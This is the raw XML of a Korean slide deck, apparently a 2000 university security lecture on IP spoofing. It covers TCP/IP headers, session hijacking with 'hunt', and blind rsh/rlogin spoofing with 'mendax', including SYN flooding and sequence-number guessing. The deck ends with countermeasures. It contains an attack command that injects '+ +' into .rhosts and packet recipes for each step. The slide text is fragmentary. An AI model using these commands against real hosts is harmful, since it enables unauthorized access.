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37BF-ED01-408D-8076-EBF4B30B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8E3B-BCDD-45CA-9CB1-BBAF2F82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0A85-E552-4399-B612-5771F3D46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F450-2DA5-4B80-8BFE-06D45AFF7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0756-67AF-4149-B280-01636C23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0D02-0D5D-4557-966D-25771B4E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BBD3-FF7A-449D-A9B2-E9BB34C2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CCF0-0EDA-40D9-8EF9-DD09E173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DC64-D319-45DB-A186-5CF41436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ECE2-ED4F-448D-889A-F601B8BD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8C6A-DBE7-45A3-9B20-C1FFEFA1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8FE0-BDA3-4E0B-A6C8-0D129A63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D7EB-DD81-41FF-AFF8-C935D881DD6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IP Spoofing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공격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포항공과대학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LUS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오태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PLUS015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ohhara@postech.ac.kr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IP Header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구조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ip_su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IP Header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checksum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값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ip_src, ip_ds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ource I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destination I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CP Header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구조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8153280" cy="366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struct tcph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u_int16_t th_sport;    /* source por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u_int16_t th_dport;    /* destination por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tcp_seq th_seq;        /* sequence number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tcp_seq th_ack;        /* acknowledgement number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u_int8_t th_x2:4;      /* (unused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u_int8_t th_off:4;     /* data offse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u_int8_t th_flag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u_int16_t th_win;      /* window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u_int16_t th_sum;      /* checksum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u_int16_t th_urp;      /* urgent pointer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541008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* Redhat Linux 5.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/usr/include/netinet/tcp.h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서 발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 endian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th_flags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관련 내용은 생략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CP Header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구조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th_sport, th_d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ource port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destination port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th_seq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송하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packet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순서를 나타내는 번호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th_ack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음에 받을 것으로 예상되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packet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번호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CP Header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구조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th_off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TCP Header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길이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double word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위로 나타낸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통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를 사용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th_flag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재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packet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flag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들을 나타내며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flag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URG, ACK, PSH, RST, SYN, FIN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th_win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window size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CP Header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구조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th_su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송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packet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 제대로 전송되었는지 알아보기 위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checksum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값이 저장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th_ur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urgent pointer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긴급한 데이터를 전송할 때 사용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CP Connect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CP 3 way handshak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9718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29718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2514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2514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00200" y="3200400"/>
            <a:ext cx="2895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599840" y="4191120"/>
            <a:ext cx="2895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5181480"/>
            <a:ext cx="2895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3048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N(1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3886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N(4000) , ACK(10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4952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K(40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5638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 Establish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onnect with IP Spoofing(1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onnect to Host B with IP Spoofing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89548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289548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0120" y="289548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2514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2514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2514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32004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2895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nial of Service at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358128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320040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Send SYN Packet ( src = Host A, dest = Host B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190760" y="3962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581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SYN, ACK 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39625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RST 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191120" y="4191120"/>
            <a:ext cx="3429000" cy="304560"/>
            <a:chOff x="4191120" y="4191120"/>
            <a:chExt cx="3429000" cy="304560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="108" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4191120" y="43434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5791320" y="4191120"/>
              <a:ext cx="304560" cy="304560"/>
              <a:chOff x="5791320" y="4191120"/>
              <a:chExt cx="304560" cy="304560"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="110" name=""/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5791320" y="4191120"/>
                <a:ext cx="30456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91320" y="4191120"/>
                <a:ext cx="30456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90720" y="472428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34340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imes New Roman"/>
              </a:rPr>
              <a:t>Send gussed SYN, ACK Packet( src = Host A, dest = Host B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51055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472428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Send data ( ex. echo “+ +” &gt; .rhosts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51055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RST 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548640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onnect with IP Spoofing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nd guessed ACK, SYN Packe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Host B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Host A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로 보낸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Packet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quence number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를 알아야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Packet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을 보낼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Non Blind IP Spoofing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Host A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Host B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가 주고받는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Packet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을 볼 수가 있다면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quence number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를 쉽게 알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IP Spoofing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종류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Non Blind IP Spoofing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Host A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Host B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가 주고받는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Packet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을 볼 수 있는 상태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quence number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를 알 수 있기 때문에 쉽게 공격이 가능하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nection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을 계속 유지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IP Spoofing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종류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Blind IP Spoofing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Host A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Host B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가 주고받는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Packet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을 볼 수 없는 상태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quence number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를 추정해야 되기 때문에 공격이 어렵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nection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을 계속 유지하기가 곤란하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목차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IP Spoofing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CP/IP Packet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의 구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IP Header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의 구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TCP Header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의 구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CP Connection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onnect with IP Spoofing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Non Blind IP Spoofing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nect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가 되어 있는 상태를 살피고 있다가 중간에 끼어 드는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nection Hijacking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할 때 흔히 사용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nection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을 끊어 버리거나 중간에 해커가 원하는 명령을 수행하게 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One time password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를 무력화 시킬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Hunt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는 프로그램을 사용해 쉽게 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hunt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를 이용한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IP Spoofing(1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55344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hunt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를 이용한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IP Spoofing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5152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hunt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를 이용한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IP Spoofing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5152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hunt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를 이용한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IP Spoofing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41.223.163.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서 두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user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서로 대화를 하고 있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hunt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를 이용해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41.223.163.30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141.223.163.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hijack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하려고 준비하고 있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41.223.163.30-&gt;141.223.163.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현재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guest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사용하고 있음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hunt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를 이용한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IP Spoofing(5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55344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hunt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를 이용한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IP Spoofing(6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5152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hunt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를 이용한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IP Spoofing(7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55344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hunt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를 이용한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IP Spoofing(8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guest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는 이유없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connection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 끊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ohhara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guest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 이상한 말을 하는 것으로 느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guest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 한 이상한 말은 실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acker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connection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을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ijacking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해서 입력한 것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Blind IP Spoofing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Sequence number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 추측이 가능한 경우에만 공격이 가능하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rsh, rlogin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과 같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IP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를 가지고 인증하는 서비스를 공격할 때 사용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Denial of Servic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공격이 우선적으로 필요하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endax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프로그램을 사용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rsh, rlogin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인증을 쉽게 무력화 시킬 수 있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목차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IP Spoofing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종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Non Blind IP Spoofing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hunt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를 이용한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IP Spoof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Blind IP Spoofing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mendax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를 이용한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IP Spoof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mendax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IP Spoofing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Sequence Number Guessing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IP Spoofing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을 막기 위한 대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mendax</a:t>
            </a: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를 이용한 </a:t>
            </a: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IP Spoofing(1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endax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사용 방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266688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Usage: mendax [OPTIONS] &lt;source&gt; &lt;target&gt; [&lt;gateway&gt;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-p PORT       first port on localhost to occu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-s PORT       server port on &lt;source&gt; to sw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-l USERNAME   user on &lt;sourc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-r USERNAME   user on &lt;targe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-c COMMAND    command to exe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-w PORT       wait for a TCP SYN packet on port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-d            read data from stdin and send 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-t            test whether attack might succ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-L TERM       spoof rlogind instead of rsh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-S PORT       port from which to sample seq numb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mendax</a:t>
            </a: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를 이용한 </a:t>
            </a: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IP Spoofing(2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55344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mendax</a:t>
            </a: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를 이용한 </a:t>
            </a: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IP Spoofing(3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141.223.94.22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에 있는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lus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사용자는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141.223.163.2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ohhara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사용자를 신뢰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공격 방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urier New"/>
              </a:rPr>
              <a:t>mendax -l plus -r ohhara -c “echo + + &gt;&gt; .rhosts” 141.223.163.23 141.223.94.2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rhosts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에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+ +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를 추가해서 누구나 로그인을 할 수 있게 된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mendax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IP Spoofing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과정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676520"/>
            <a:ext cx="7848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hl    =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v     = IPVER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tos   = 0x2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len   = sizeof(struct ip) + sizeof(struct tcphd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id   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ttl   = 0x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off  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p     = IPPROTO_T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src   = 143.209.4.3 /* this host must not exis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dst   = 141.223.163.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sum   = checksum of ip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sport = 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dport = 5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off   =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win  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seq   = 34328978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ack  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flags = TH_SY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sum   = checksum of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mendax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IP Spoofing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과정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위와 같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acket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을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 보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ip_id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packet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마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을 더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th_seq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packet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마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6400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을 더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th_sport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packet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마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을 더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43.209.4.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서 응답이 없으므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41.223.163.2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 일시적으로 서비스 불능상태가 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흔히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SYN Flooding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이라 불린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mendax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IP Spoofing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과정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676520"/>
            <a:ext cx="7848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hl    =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v     = IPVER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tos   = 0x2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len   = sizeof(struct ip) + sizeof(struct tcphd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id    = 0x41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ttl   = 0x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off  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p     = IPPROTO_T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src   = hacker’s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dst   = 141.223.94.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sum   = checksum of ip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sport = 78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dport = 5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off   =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win  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seq  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ack  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flags = TH_SY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sum   = checksum of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mendax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IP Spoofing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과정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위와 같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acket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을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 보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ip_id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packet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마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을 더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th_sport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packet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마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을 더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th_seq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packet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마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6400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을 더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돌아오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packet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equence number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를 분석해 어떤 규칙이 있는지 알아낸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mendax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IP Spoofing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과정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676520"/>
            <a:ext cx="7848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hl    =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v     = IPVER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tos   = 0x2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len   = sizeof(struct ip) + sizeof(struct tcphd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id    = 0x4189 +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ttl   = 0x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off  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p     = IPPROTO_T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src   = 141.223.163.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dst   = 141.223.94.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sum   = checksum of ip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sport = 5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dport = 5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off   =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win  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seq  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ack  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flags = TH_SY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sum   = checksum of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mendax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IP Spoofing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과정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(6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위와 같은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acket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보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41.223.94.2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는 위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packet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을 받고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41.223.163.23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으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packet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을 보내지만 서비스 불능상태이기 때문에 응답이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여기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41.223.94.2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가 보낸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packet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quence number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를 방금 전의 분석을 토대로 추정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mendax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IP Spoofing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과정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(7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1676520"/>
            <a:ext cx="7848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hl    =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v     = IPVER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tos   = 0x2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len   = sizeof(struct ip) + sizeof(struct tcphd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id    = 0x4189 +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ttl   = 0x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off  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p     = IPPROTO_T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src   = 141.223.163.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dst   = 141.223.94.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sum   = checksum of ip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sport = 5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dport = 5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off   =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win  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seq  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ack   = 660224001 /* gussed numb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flags = TH_SYN | TH_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sum   = checksum of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IP Spoofing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TCP/IP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구조적인 허점을 이용한 공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신의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IP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를 속여서 접속하는 공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IP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인증하는 서비스를 무력화 시킬 수 있음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 ex. rlogind, rshd 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198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ris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IP Spoofing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공격의 가능성에 대해 예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199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evin Mitnick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 처음으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IP Spoofing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공격을 시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mendax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IP Spoofing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과정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(8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위와 같은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acket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보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quence number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의 예측 값이 정확하다면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nection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 성공적으로 이루어진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mendax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IP Spoofing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과정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(9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1676520"/>
            <a:ext cx="78487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hl    =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v     = IPVER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tos   = 0x2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len   = sizeof(struct ip) + sizeof(struct tcphdr) +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id    = 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ttl   = 0x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off  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p     = IPPROTO_T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src   = 141.223.163.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dst   = 141.223.94.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sum   = checksum of ip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sport = 5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dport = 5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off   =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win  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seq  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ack   = 660224001 /* gussed numb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flags = TH_ACK | TH_PU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sum   = checksum of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data     = “ohhara plus echo + + &gt;&gt; .rhost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mendax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IP Spoofing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과정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(10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위와 같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acket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을 보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echo + + &gt;&gt; .rhosts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명령이 수행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mendax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IP Spoofing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과정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(11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676520"/>
            <a:ext cx="7848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hl    =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v     = IPVER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tos   = 0x2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len   = sizeof(struct ip) + sizeof(struct tcphd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id    = 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ttl   = 0x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off  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p     = IPPROTO_T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src   = 141.223.163.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dst   = 141.223.94.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sum   = checksum of ip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sport = 5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dport = 5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off   =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win  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seq  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ack   = 660224001 /* gussed numb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flags = TH_R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sum   = checksum of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mendax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IP Spoofing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과정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(1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위와 같은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acket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보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41.223.163.23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41.223.94.2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nection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RST packet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을 보내서 끊는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mendax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IP Spoofing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과정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(1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676520"/>
            <a:ext cx="7848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hl    =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v     = IPVER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tos   = 0x2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len   = sizeof(struct ip) + sizeof(struct tcphd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id   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ttl   = 0x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off  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p     = IPPROTO_T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src   = 143.209.4.3 /* this host must not exis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dst   = 141.223.163.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ip_sum   = checksum of ip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sport = 200 +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dport = 5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off   =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win  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seq   = 3432898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ack  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flags = TH_R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th_sum   = checksum of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mendax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IP Spoofing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과정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(1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위와 같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acket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을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 보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ip_id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packet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마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을 더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th_seq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packet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마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6400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을 더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th_sport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packet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마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을 더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ST packet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41.223.163.2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으로 보낸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41.223.163.2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 서비스 불능상태에서 서비스 가능상태로 바뀐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equence Number Guessing(1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Blind IP Spoofing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격은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quence number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를 얼마나 정확히 추정하느냐에 따라 공격의 성공여부가 결정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O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quence number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를 너무 간단한 규칙하에 발생시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equence Number Guessing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64K Ru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YN packet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을 하나 받을 때마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quence number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를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640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씩 증가 시킴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HP-UX all version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IRIX 5.3 and befor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OSF 3.2 and befor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unOS 5.4 and befor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AIX 3 and befor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equence Number Guessing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Time relation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간에 비례해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equence number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를 증가 시킴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IRIX 6.2 and aft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OSF 4.0 and aft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SunOS 5.5 and aft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Microsoft Windows all version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Linux 1.x and befor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FreeB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CP/IP Packet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구조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066680" y="2438280"/>
            <a:ext cx="7239240" cy="1755360"/>
            <a:chOff x="1066680" y="2438280"/>
            <a:chExt cx="7239240" cy="1755360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1066680" y="2438280"/>
              <a:ext cx="723924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9320" y="281952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P H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81280" y="28195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CP H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28195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pplication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24080" y="243828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72320" y="3733920"/>
              <a:ext cx="120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 by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658320" y="3733920"/>
              <a:ext cx="120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 by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62720" y="243828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equence Number Guessing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Rando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quence number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의 규칙을 알 수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비교적 안전하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AIX 4 and aft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Linux 2.x and aft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IP Spoofing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을 막기 위한 대책</a:t>
            </a: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(1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Router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urce routing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허용하지 않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내부 사용자끼리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IP Spoofing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은 막을 수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quence number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Random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하게 발생시키도록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quence number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를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niff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할 수 있는 경우에는 막을 수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IP Spoofing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을 막기 위한 대책</a:t>
            </a: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Denial of Service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발생하지 않도록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IP Spoofing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Denial of Service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가 공격의 시작이므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Denial of Service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를 막을 수 있다면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IP Spoofing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공격을 막을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I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인증하는 서비스는 사용하지 않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IP Spoofing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은 막을 수 있지만 사용이 상당히 불편해 진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IP Spoofing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을 막기 위한 대책</a:t>
            </a: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암호화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rotocol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사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암호화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Protocol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을 사용하면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IP Spoofing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공격을 상당히 차단할 수 있지만 속도가 느려지고 사용이 아직 보편화되어 있지 않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IP Header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구조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600200"/>
            <a:ext cx="815328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struct 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u_int8_t ip_hl:4;       /* header length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u_int8_t ip_v:4;        /* version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u_int8_t ip_tos;        /* type of servic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u_short ip_len;         /* total length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u_short ip_id;          /* identification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u_short ip_off;         /* fragment offset field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u_int8_t ip_ttl;        /* time to liv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u_int8_t ip_p;          /* protocol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u_short ip_sum;         /* checksum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struct in_addr ip_src, ip_dst;/* source and dest address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563868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* Redhat Linux 5.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/usr/include/netinet/ip.h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서 발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 endian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ip_off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관련 내용은 생략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IP Header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구조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ip_h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IP Header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길이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double word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위로 나타낸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통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를 사용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ip_v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I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Version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통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IPVERSION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을 사용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ip_to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ervice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type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을 나타낸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IP Header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구조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ip_len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재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packet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전체 크기를 나타낸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ip_i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각각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packet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을 구분할 때 사용하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id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통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packet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을 하나 보낼 때 마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씩 증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ip_off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fragment offset field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IP Header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구조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ip_tt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time to live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를 나타낸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packet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outer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를 최대 몇 개까지 거칠 수 있는지 한계를 설정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ip_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protocol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을 나타낸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TC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를 사용하는 경우에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IPPROTO_TC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를 사용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2T06:06:10Z</dcterms:created>
  <dc:creator>ohhara</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Taeho Oh</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2000-01-06T14:41:41Z</dcterms:modified>
  <cp:revision>114</cp:revision>
  <dc:subject/>
  <dc:title>슬라이드 제목 없음</dc:title>
</cp:coreProperties>
</file>